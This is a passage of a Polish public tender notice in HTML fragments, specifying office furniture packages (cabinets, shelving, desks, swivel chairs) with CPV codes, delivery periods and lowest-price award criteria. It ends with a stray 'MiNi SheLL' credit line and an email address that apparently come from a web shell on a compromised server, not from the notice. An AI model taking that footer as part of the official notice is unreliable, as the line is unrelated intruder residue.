LP.	Nazwa towaru	
1.	Szafka z szufladą i drzwiczkami i półką  (szuflada i drzwiczki zamykane na klucz) wymiary 500 mm x 600 mm x W*	Ilość w szt.2
2.	Szafka z szufladami  zamykane na klucz  wymiary 400 mm x 600 mm x W*	Ilość w szt.2
3.	Półka wisząca  na segregatory wymiary 600 mm x 400 mm x 400 mm	Ilość w szt.2
4.	Biurko półokrągłe profilowane  wymiary 1700 mm x 830 mm x W*  z wysuwaną półką na klawiaturę komputera ,na stelażu metalowym chrom-mat. z przesłoną z blachy perforowanej  Alu.	Ilość w szt.2
5.	Nadstawka do regału narożnego  460 mm (szerokość frontu) x głębokość**  x 400 mm z dwiema półkami zamykanymi drzwiczkami na klucz	Ilość w szt.1
6.	Regał narożny 460 mm (szerokość frontu) x głębokość** x  1900 mm - dwie półki dolne zabudowane drzwiczkami zamykanymi na klucz ,pozostałe otwarte	Ilość w szt.1
7.	Regał na segregatory 900 mm x 360 mm x 1900 mm - dwie dolne półki zabudowane drzwiczkami zamykanymi na klucz , pozostałe półki otwarte 	Ilość w szt.3
8.	Nadstawka na regał  900 mm x 360mm x 400mm z dwiema półkami zabudowanymi drzwiczkami zamykanymi na klucz	Ilość w szt.3
9.	Nadstawka na regał  460 mm x 360 mm x 400 mm z dwiema półkami zabudowanymi drzwiczkami zamykanymi na klucz	Ilość w szt.1
10.	Regał na segregatory 460 mm x 360 mm x 1900 mm - dwie dolne półki zabudowane drzwiczkami zamykanymi na klucz , pozostałe półki otwarte	Ilość w szt.1
11.	Nadstawka na regał  400 mm x 360 mm x 400 mm z dwiema półkami zabudowanymi drzwiczkami zamykanymi na klucz	Ilość w szt.1
12.	Regał na segregatory 400 mm x 360 mm x 1900 mm - dwie dolne półki zabudowane drzwiczkami zamykanymi na klucz, pozostałe półki otwarte 	Ilość w szt.1
13.	Nadstawka na biurko pod monitor komputera	Ilość w szt.2
14.	Wieszak ubraniowy naścienny z półką na kapelusze	Ilość w szt.1
15.	Podstawka pod komputer na kółkach o wymiarach 500mm x 260mm z ogranicznikami uniemożliwiającymi przesuwanie do tyłu i na boki	Ilość w szt.2
*   - wysokość mebli zgodna z wysokością biurka
** - wymiary głębokości zgodne z rysunkiem
2.	Przed przystąpieniem do przetargu, Wykonawca obowiązany jest do dokonania wizji lokalnej na miejscu wraz z koniecznym pomiarem pomieszczenia pod kątem proponowanych mebli..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET III:  Meble do pokoju nr 19 - Wydział Kontroli Podłączeń i Egzekucji Należności

      1. Nadstawka szafy - 
a)	2-drzwiowa, 
b)	zamykana  na zamek ,
c)	wymiary:  Sz -  600 mm,  G - 400 mm, W - 400 mm 
d)	materiał : konstrukcja i półki wykonane z płyty laminowanej grubości min.18 mm w kolorze  /dzika grusza jasna/ (kolor i wygląd zewnętrzny dopasowany do istniejących mebli).

2.Szafa na akta -
a)	2-drzwiowa, 
b)	zamykana  na klucz ,
c)	wymiary:  Sz -  800 mm,  G - 400 mm,  W - 1180 mm,  
d)	dolny cokół : 90 mm,
e)	podzielona dwiema poziomymi półkami na 3 jednakowe poziomy przeznaczone
      do przechowywania segregatorów A4 w pozycji pionowej,
f)	materiał : konstrukcja i półki wykonane z płyty laminowanej grubości min.18 mm w kolorze  /dzika grusza jasna/ (kolor i wygląd zewnętrzny dopasowany do istniejących mebli).
Uwagi do pakietu I, II, III.
1.	Kształt i wymiary mebli zgodne z załączonym schematem.
2.	Rozmieszczenie półek w meblach przeznaczonych na przechowywanie segregatorów powinno być tak dobrane, aby ich wysokość w świetle wynosiła minimum 330 mm.
3.	Konstrukcja i półki mebli wykonane z płyty grubości minimum 18 mm.
4.	Wysokość wszystkich biurek ma być jednakowa i mieścić się w granicach 730 - 750 mm.
5.	Blat biurka wykonany z płyty wiórowej laminowanej grubości minimum 25 mm.
6.	Wszystkie fronty dostarczonego umeblowania mają być wykonane z płyty wiórowej laminowanej grubości minimum 18 mm.
7.	Ścianka tylna szaf, regałów,  kontenerów itp. nie może być wsuwana.
8.	Wykończenia z okleiny PCV o grubości minimum 2 mm.
9.	Zawiasy typu Blum + Blumontion lub równoważne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET IV: fotele i krzesła.

      1.Fotel gabinetowy -  szt. 1
a)	Tapicerka Micro w kolorze beżowym, dopasowanym do koloru tapicerki
     krzeseł w gabinecie Dyrektora ds. Inwestycjnych i Logistyki
b)	podłokietniki w kolorze czereśni koniakowej,
c)	wysokość siedziska regulowana za pomocą podnośnika pneumatycznego,
d)	siedzisko wyprofilowane w części lędźwiowej, 
e)	kółka do powierzchni miękkich. 
f)	objęte gwarancją w systemie /door to door/.

2.Fotele obrotowe  -  szt. 13
a)	tapicerowane tkaniną Micro w kolorze granatowym, 
b)	wyposażone w podłokietniki,
c)	wyposażone w mechanizm /TILT/ umożliwiający ich blokadę w pozycji /do pracy/,
d)	wysokość siedzisk regulowana za pomocą podnośnika pneumatycznego,
e)	siedziska wyprofilowane w części lędźwiowej,  
f)	wyposażone w nylonową podstawę jezdną, 
g)	objęte gwarancją w systemie /door to door/.

3.Krzesła  -  szt. 6
               a) dostawiane,
               b) o metalowej,  chromowanej ramie, 
               c) z miękkim tapicerowanym siedziskiem i  oparciem,
               d) tapicerka w kolorze  granatowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.20.00-0, 39.11.31.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com